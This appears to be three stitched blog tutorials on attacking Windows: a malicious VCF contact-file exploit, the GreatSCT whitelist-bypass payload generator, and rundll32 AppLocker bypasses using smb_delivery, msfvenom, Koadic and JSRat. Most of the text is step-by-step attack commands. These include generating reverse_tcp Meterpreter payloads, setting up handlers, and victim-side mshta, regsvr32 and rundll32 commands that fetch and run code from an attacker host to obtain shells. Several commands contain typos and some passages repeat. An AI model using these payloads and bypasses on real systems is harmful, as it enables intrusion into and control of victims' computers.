Exploiting Windows PC using Malicious Contact VCF file

A huge shoutout to cyber security researcher John Page for bringing this vulnerability into the internet’s eye on 15^th January 2019. This was a 0 day exploit and of course works with the latest windows 10 too. It is categorized under “Insufficient UI warning remote code execution” vulnerability.

Introduction: Basically what John discovered was that if we replaced the website in a VCF file with the local path of a CPL file, it tends to install that file instead of opening it on browser. This is done by replacing the “http://” with “http.\\”, which is totally insane since a user would need the eyes of multi mega pixels to discover an intentional path error of that kind! So all we need to do is to send the victim that VCF file along with our CPL file in a folder named “http” (it has to be http only for local path inclusion) and we shall get a shell.

To read more about the research follow the link here.

Methodology:

1.      Making an msfvenom windows payload with .dll extension.

2.      Sending the dll file in a folder named “http”.

3.      Creating a contact file in the parent folder of “http”.

4.      Adding a website into the contact.

5.      Changing the prefix of website from http:// to http.\\

6.      Renaming the dll file to “.cpl”

7.      Running multi handler in a window

8.      Opening the website path from the contact

9.      Spawning shell.

Proof of Concept:

The first step would be to make a payload with a dll extension. For this purpose we are using msfvenom’s windows payload but any other payload should work just fine.

In this case my local IP address is 192.168.1.109.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f dll > shell.dll

Next we transfer this payload to the victim machine in a new folder named http. This has to be http and nothing else since we are including a path later on in the website link. And it has to be in the current directory too. So we copy this shell.dll file into the victim machine.

Next and the most important step is to make a contact VCF file. You can download a sample vcf too and add a website but we made a new contact file. The system we are using is windows 10 so the version of VCF file may differ from yours but it would work just the same.

Add any name in the contact file.

I added Raj Chandel.

Traverse to the next tab home and you’ll see a text box to input a website. Add any website’s name as you desire. I added my website’s name “hackingarticles.in” but here is the most important thing you have to note here:

A generic website’s link is http://www.hackingarticles.in but we modify the prefix just a little by replacing the http:// with http.\\

This is because we don’t actually want to include a website but we want to include a path to our DLL file so that when the victim click’s on the website, our DLL should run.

Here, we are suffixing the website link with “.cpl” extension. A CPL file is a control panel item, such as Displays, Mouse, Sound, or Networking, used by the Windows operating system.

Save the contact. Now rename our payload from shell.dll to “www.hackingarticles.in.cpl”

Now we are prepped and ready to run the DLL file so we set up multi/handler on a terminal window and opened the contact on victim’s machine.

As soon as we click on the link here, we will see a session is obtained in the kali terminal!

This spawns a shell of the current user of windows that is logged on.

Conclusion: This is an amazing vulnerability discovered by John Page and all the working versions of windows that support contact VCF files are affected by it. As you can see we have spawned a windows 10 shell here, it is safe to say lower versions are affected too. To read more about the discovery, follow the link to John Page’s website here. Thanks for reading.

GreatSct - An Application Whitelist Bypass Tool

While wrting Applocker bypass series, we found a new tool which was especially design for bypassing whitelisting application.  So Idecided to write this article where e are introducing another most interesting tool “Great SCT –A metasploit payload generator” tool which is similar to unicorn or msfvenom because it depeands on metasploit framework to provide reverse connection of victim’s machine. So let’s began with its tutorial and check its functionality.

Table of Content

§  GreatSCT

§  Installation & Usages

§  Generate malicious hta file 

§  Generate malicious sct file 

§  Generate malicious dll file 

GreatSCT

GreatSCT is current under support by @ConsciousHacker, the project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team. It is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.

You can download it from here: https://github.com/GreatSCT/GreatSCT

Installation & Usages

It must first be downloaded and installed in order to start using Great SCT. Run following command to download Great SCT from github and also take care of its dependency tools while installing it.

This help to bypass Applocker policy by using following tools:

§  Installutil.exe The Installer tool is a command- line tool that lets you to install and uninstall server resources in specific assemblies by running the installer components.

§  Msbuild.exe : The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild.

§  Mshta.exe : Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with.

§  Regasm.exe : The Assembly Registration tool reads the metadata within an assembly and adds the necessary entries to the registry, which allows COM clients to create .NET Framework classes transparently. 

§  Regsvcs.exe : RegSvcs stands for Microsoft .NET Remote Registry Services it is known for .NET Services Installation.

§  Regsvr32.exe : Regsvr32 is a command line utility for register and unregister OLE controls in the Windows Registry, such as DLLs and ActiveX controls.

git clone https://github.com/GreatSCT/GreatSCT.git

cd GreatSCT

cd setup

./setup.sh

Once it’s downloaded and running, type the following command to access the help commands:

use Bypass

Now to get the list of payloads type :

list

Generate malicious hta file 

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use mshta/shellcode_inject/base64_migrate.py

Once the command is execute, type :

generate

After executing generate command, it asks you which method you want to use. As we are going to use msfvenom type 1 to choose first option. Then press enter for meterpreter. Then provide lhost and lport i.e. 192.168.1.107 and 4321 respectively.

When generating the shellcode, it will ask you to give a name for a payload. By default it will take ‘payload’ as name. As I didn’t wanted to give any name, I simply pressed enter.

Now, it made two files. One resource file and other an hta file.

Now, firstly, start the python’s server in /usr/share/greatsct-output by typing:

python -m SimpleHTTPServer 80

Now execute the hta file in the command prompt of the victim’s PC.

mshta.exe http://192.168.1.107/payload.hta

Simultaneously, start the multi/handler using recourse file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Visit here “Bypass Application Whitelisting using mshta.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious sct file 

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use regsvr/shellcode_iject/base64_migrate.py

Once the command is execute, type :

generate

Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcp as a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the give port (any) as here you can see in the image below that we have given lport as 2345

After giving the details, it will ask you a name for your malware. By default it will set name ‘payload’ so either you can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .sct file.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .sct file.

python -m SimpleHTTPServer 80

Now execute the .sct file in the run window of the victim’s PC as shown below

regsvr32 /u /n /s /i:http;//192.168.1.107/payload.sct

Simultaneously, start the multi/handler using recourse file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Visit here “Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious dll file 

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use regasm/meterpreter/rev_tcp.py

Once the command is execute, type:

set lhost 192.168.1.107

generate

After giving the details, it will ask you a name for your malware. By default it will set name ‘payload’ so either you can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .dll file.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .sct file.

python -m SimpleHTTPServer 80

Now place above generated dll file inside : C:\Windows\Microsoft.NET\Framework\v4.0.30319\v4.0.30319\ and then  execute the .dll file in the run window of the victim’s PC as shown below:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\v4.0.30319\regasm.exe /U payload.dll

Simultaneously, start the multi/handler using recourse file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Bypass Application Whitelisting using rundll32.exe (Multiple Methods)

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with RunDLL files.

Tables of Content

·         Introduction

·         Working of DLL files

·         Advantages

·         Disadvantages

·         Different methods for AppLocker Bypass using DLL files

·         Conclusion

Introduction

DLL files and their Importance for window’s OS to work and it also determines the working of other programs that customises your windows. Dynamic Link Library (DLL) files are the type of file which provides instructions to other programs on how to call upon certain things. Therefore, multiple software’s can share such DLL files, even simultaneously. In spite of being in the same format as .exe file, DLL files are not directly executable like .exe files. DLL file extensions can be : .dll(Dynamic Link Library), .OCX(ActiveX Controls), .CPL(Control Panel), .DRV(Device Drivers).

Working

When in use, DLL files are divided into sections. This makes working of DLL files easy and faster. Each section is installed in main program at run time. As each section is different and independent; load time is faster and is only done when the functionality of the said file is required. This ability also makes upgrades easier to apply without affecting other sections. For example: you have a dictionary program and new words are added every month, so for this all you have to do is update it; without requiring to install a whole another program for it.

Advantages

·         Uses fewer resources

·         Promotes modular architecture

·         Eases deployment and installation

Disadvantages

·         A dependent DLL is upgraded to a new version.

·         A dependent DLL is fixed.

·         A dependent DLL is overwritten with an earlier version.

·         A dependent DLL is removed from the computer.

Methods

·         Smb_Delivery

·         MSFVenom

·         Koadic

·         JSRat

So, our method is using smb_delivery. To use this method, open the terminal in kali and type the following commands ;

msfconsole

use exploit/windows/smb/smb_delivery

msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107

msf exploit(windows/smb/smb_delivery) > exploit

Now run the malicious code through rundll32.exe in the windows machine to obtain meterpreter sessions.

As the above code will run, it will provide you with a command that is to be executed on the victim’s PC; in order to get a session. So copy and paste the said command in the run window of the victim’s PC as shown in the image below:

rundll3.exe \\192.168.1.107\ZtmW\test.dll,0

As soon as the command is executed, you will have your meterpreter session. To access the session type :

sessions 1

sysinfo

MSFVenom

Our second method is via MSFVenom. For the utilisation of this method, type the following command in the terminal of kali :

msfvenom -p windows/meterpreter.reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll

Once the payload is created, run the following command in the run window of victim’s PC:

rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

Simultaneously, start the multi/handler to get a session by typing :

msfconsole

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.107

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

Koadic

Our next method is using Koadic framework. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once the koadic is up and running, type:

use stager/js/rundll32_js

set SRVHOST 192.168.1.107

run

Running the exploit will give you a command. Copy that command from rundll32.exe to 6.0”) and paste it in the command prompt of the victims’ PC.

Once you run the command in the cmd, you will have your session. As shown in the following imgae.

To access the session type :

zombies 0

Now the dilemma is, what to do if command prompt is blocked in victim’s PC.

If the command line is blocked, there is script developed by Didier Stevens. You can find them in the following link :

http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip

By executing the above URL, you will download a zip file. Extract that zip file and use the following command to run the said file in run windows:

rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

As soon as you run the command, you will have unblocked the cmd. As shown below:

JSRat

Our next method of attacking regsvr32 is by using JSRat and you can download it from github. This is another very small command and control framework just like koadic and Powershell Empire for generating malicious task only for rundll32.exe and regsvr32.exe. JSRat will create a webserver and on that webserver we will find our .sct file. To use this method type:

./JSRat.py -I 192.168.1.107 -p 4444

Once JSRat starts working, it will give you a link to open in browser. That webpage will have a code which is to be executed on the victim’s pc.

Therefore, open the http://192.168.1.107/wtf link in your browser. There you will find the said code as shown in the image below:

Run that code in the command prompt of the victims’ PC as shown:

And voila, you will have a session as the image below:

Conclusion

DLL files are collection of various codes and procedure held together. These files helps windows programs to execute accurately. These files were created for multiple programs to use them simultaneously. This technique helps in memory conservation. Therefore these files are important and required by windows to run properly without giving users any kind of problems. Hence, exploitation through such files is very efficient and lethal. And above presented methods are the different ways to do it.